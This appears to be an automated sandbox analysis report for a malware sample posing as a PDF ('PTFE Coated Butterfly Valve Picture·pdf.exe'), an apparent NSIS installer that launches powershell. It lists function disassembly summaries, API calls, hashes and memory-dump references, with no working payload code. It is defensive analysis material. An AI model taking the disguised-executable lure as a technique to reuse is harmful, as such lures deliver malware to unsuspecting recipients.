API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nst5070.tmp
API String ID: 1356686001-671699711
Opcode ID: 1dca66d2d1093a5130de9b07e79a19b0c80f7b3ba9a11136c7381f0e18dd9290
Instruction ID: 26fcae0a7b2a502e926faea7c6e927eea7b3aae3134fdb689c9e3a18d41500d2
Opcode Fuzzy Hash: 1dca66d2d1093a5130de9b07e79a19b0c80f7b3ba9a11136c7381f0e18dd9290
Instruction Fuzzy Hash: 3E1145B1E00108BFEB10AFA5EE89EAF767DEB54358F10403AF505B71D1D6B85D419B28

Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
RegCloseKey.ADVAPI32(?), ref: 00402AE0
RegCloseKey.ADVAPI32(?), ref: 00402B05
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 26d703e6b955c0b1753e13e50ef068aceb5afa025d50a3e8e2eadb28cc0acf60
Instruction ID: feb6aed171ad8b85e204e5b4e2feb4536d295dbd67c3687bd8867431d3a466b7
Opcode Fuzzy Hash: 26d703e6b955c0b1753e13e50ef068aceb5afa025d50a3e8e2eadb28cc0acf60
Instruction Fuzzy Hash: 53117F71A00108FFDF229F90DE89EAE3B7DEB54349B104076FA01B10A0D7749E51DB69

Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CE2
GetClientRect.USER32(00000000,?), ref: 00401CEF
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
DeleteObject.GDI32(00000000), ref: 00401D2D

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 17232caade98c5884c3b98c25dda3274542a73d841a3bd6b31c87e9b59191b88
Instruction ID: 14b9f5ff68e8b0ed0f2204d74c17d06140583eb6ed2bbf798243b331d3a4cd3b
Opcode Fuzzy Hash: 17232caade98c5884c3b98c25dda3274542a73d841a3bd6b31c87e9b59191b88
Instruction Fuzzy Hash: A9F0E7B2A04114AFEB01ABE4DE88DAFB7BDEB54305B10447AF602F6191C7789D018B79

Function 0040393E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00422F00), ref: 004039D6

Strings

"C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe", xrefs: 0040393F
1033, xrefs: 00403942, 0040394C, 004039BD
Robotagtige Setup: Completed, xrefs: 00403941

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe"$1033$Robotagtige Setup: Completed
API String ID: 530164218-4268196472
Opcode ID: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
Instruction ID: 79edc1b1becbb318b5d11430581b7fe373163fbdb48c995140def98ab9010f1e
Opcode Fuzzy Hash: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
Instruction Fuzzy Hash: B311F3F1B04611ABCB20DF14DD809737BADEBC4756328823FE941A73A0C67D9D029B98

Function 00405859 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06

Part of subcall function 00405804: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst5070.tmp,?,00405870,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405812
Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst5070.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058AC
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 004058BC

Strings

C:\Users\user\AppData\Local\Temp\nst5070.tmp, xrefs: 0040585F, 00405864, 0040586A, 004058A5, 004058AB, 004058B3, 004058BB
C:\Users\user\AppData\Local\Temp\, xrefs: 00405859

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nst5070.tmp
API String ID: 3248276644-297864712
Opcode ID: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
Instruction ID: 1d2993da53655c0900dfa7f8eb6ffa86a16769ab8224128061af08a25d69d353
Opcode Fuzzy Hash: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
Instruction Fuzzy Hash: 16F0F427105E5165DA22323B1C05B9F1A44CD86354718C53BFC51F22D2DA3CC8629DBE

Function 0040576B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405771
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 0040577A
lstrcatA.KERNEL32(?,00409014), ref: 0040578B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040576B

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 00e6a1abdfef3fccf4d12e3b382aa79108487555f8088e95eeaee7bf5793dfbe
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: 94D0A9B2A05A307AD3122715AC0DE8B2A08CF82300B094023F200B72A2CB3C1D418BFE

Function 00405804 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst5070.tmp,?,00405870,C:\Users\user\AppData\Local\Temp\nst5070.tmp,C:\Users\user\AppData\Local\Temp\nst5070.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055BB,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405812
CharNextA.USER32(00000000), ref: 00405817
CharNextA.USER32(00000000), ref: 0040582B

Strings

C:\Users\user\AppData\Local\Temp\nst5070.tmp, xrefs: 00405805

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nst5070.tmp
API String ID: 3213498283-671699711
Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
Instruction ID: 4ca260c7e1a22d06af12069221c3406c2bee361732d71c1e98a9e22686a99acb
Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
Instruction Fuzzy Hash: 71F0C253908F942BFB3276641C44B675F88DB55350F04C07BEA80B62C2C6788860CBEA

Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
GetTickCount.KERNEL32 ref: 00402C33
CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
ShowWindow.USER32(00000000,00000005), ref: 00402C5E

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
Instruction ID: 69bd14cd8f1a0d496662edafeb8c2727d8675a530a128bc1770b64b88ff4c26b
Opcode Fuzzy Hash: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
Instruction Fuzzy Hash: 2CF05E7090A220ABD6217F64FE0CDDF7BA4FB41B527018576F144B21E4C379988ACB9D

Function 00404E86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404EB5
CallWindowProcA.USER32(?,?,?,?), ref: 00404F06

Part of subcall function 00403F2A: SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 00403F3C

Strings

, xrefs: 00404E96

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
Instruction ID: f49a9e3fcece2dd6490d1841f3d0f5b5163df4d3f93a23d44cf999a9bd086e10
Opcode Fuzzy Hash: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
Instruction Fuzzy Hash: D10171B110020EABDF209F11DC84A9B3725FBC4754F208037FB11761D1DB799C61A7A9

Function 004035E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,004035BC,004033D6,?), ref: 004035FE
GlobalFree.KERNEL32(?), ref: 00403605

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004035E4

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
Instruction ID: f6c6d059f9b75f5cc6a79e0049e3afa1176d7e4558308c53008dbe788c85df41
Opcode Fuzzy Hash: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
Instruction Fuzzy Hash: 3EE0C2338100206BC7211F0AED04B5E77AC6F48B22F054066FC407B3A08B742C418BCC

Function 004057B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,80000000,00000003), ref: 004057B8
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,C:\Users\user\Desktop\PTFE Coated Butterfly Valve Picture#U00b7pdf.exe,80000000,00000003), ref: 004057C6

Strings

C:\Users\user\Desktop, xrefs: 004057B2

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 15550f116ff3ce815c4487a542d9ae56249738f0e4d38f85a76656e2d55d0e49
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: FAD0C7B2409D705EF31353149C08B9F6A58DF16700F195463E141EB591C6785D415BBD

Function 004058D1 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058F9
CharNextA.USER32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590A
lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913

Memory Dump Source

Source File: 00000000.00000002.1698979974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1698963107.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1698995543.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699011169.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699142535.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PTFE Coated Butterfly Valve Picture#U00b7pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction ID: 481a9c588bbd1c68550dea5b76d7ebd72626077616c8f786d6c844a28ee3c139
Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
Instruction Fuzzy Hash: 9EF0F632504418FFCB02AFA5DC0099EBBA8EF46360B2540B9F800F7310D274EF01ABA9

Analysis Process: powershell.exePID: 5316, Parent PID: 6528COMMON

Executed Functions

Function 0730BBE8 Relevance: 56.7, Strings: 44, Instructions: 1706COMMON

Download Yara Rule

Strings

x.gk, xrefs: 0730BB03
tLhk, xrefs: 0730BCA2
(fvl, xrefs: 0730C008
(fvl, xrefs: 0730D1C8
tLhk, xrefs: 0730BC15
(fvl, xrefs: 0730C278
(fvl, xrefs: 0730C5DB
(fvl, xrefs: 0730C0D1
(fvl, xrefs: 0730BDDB
(fvl, xrefs: 0730BE69
(fvl, xrefs: 0730C4F2
(fvl, xrefs: 0730D5B0
(fvl, xrefs: 0730CE36
(fvl, xrefs: 0730C220
x.gk, xrefs: 0730D441
(fvl, xrefs: 0730BCC2
(fvl, xrefs: 0730B623
4'^q, xrefs: 0730C454
(fvl, xrefs: 0730B6F3
(fvl, xrefs: 0730CD12
4sl, xrefs: 0730CD60
tLhk, xrefs: 0730B603
4sl, xrefs: 0730CD76
-gk, xrefs: 0730BB51
(fvl, xrefs: 0730CD28
4'^q, xrefs: 0730B82C
(fvl, xrefs: 0730B9B9
(fvl, xrefs: 0730BA1F
(fvl, xrefs: 0730C580
(fvl, xrefs: 0730D028
(fvl, xrefs: 0730D018
-gk, xrefs: 0730C7A0
4'^q, xrefs: 0730B8D0
(fvl, xrefs: 0730D324
(fvl, xrefs: 0730D33A
(fvl, xrefs: 0730CE20
(fvl, xrefs: 0730D1B2
(fvl, xrefs: 0730D59A
tLhk, xrefs: 0730CE86
4'^q, xrefs: 0730CF0D
x.gk, xrefs: 0730C74F
(fvl, xrefs: 0730C073
4'^q, xrefs: 0730C448
(fvl, xrefs: 0730C182

Memory Dump Source

Source File: 00000001.00000002.2134613809.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7300000_powershell.jbxd

Similarity

API ID:
String ID: (fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$(fvl$4'^q$4'^q$4'^q$4'^q$4'^q$4sl$4sl$tLhk$tLhk$tLhk$tLhk$x.gk$x.gk$x.gk$-gk$-gk
API String ID: 0-4222241264
Opcode ID: 00ae8904fa9b517706005c6114904539faaa9300044f2ef5fe3463e43c7bf4c0
Instruction ID: 1342e61ba5ad6fa05c402a35fde3f6c465263b53bd0df7c1bb7195a97a07da14
Opcode Fuzzy Hash: 00ae8904fa9b517706005c6114904539faaa9300044f2ef5fe3463e43c7bf4c0
Instruction Fuzzy Hash: 03F25FB4A00218DFDB24DF64C960BEAB7B2BB45304F1085A9D94D6B795CB31EE81CF91

Function 047DF000 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2128986233.00000000047D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

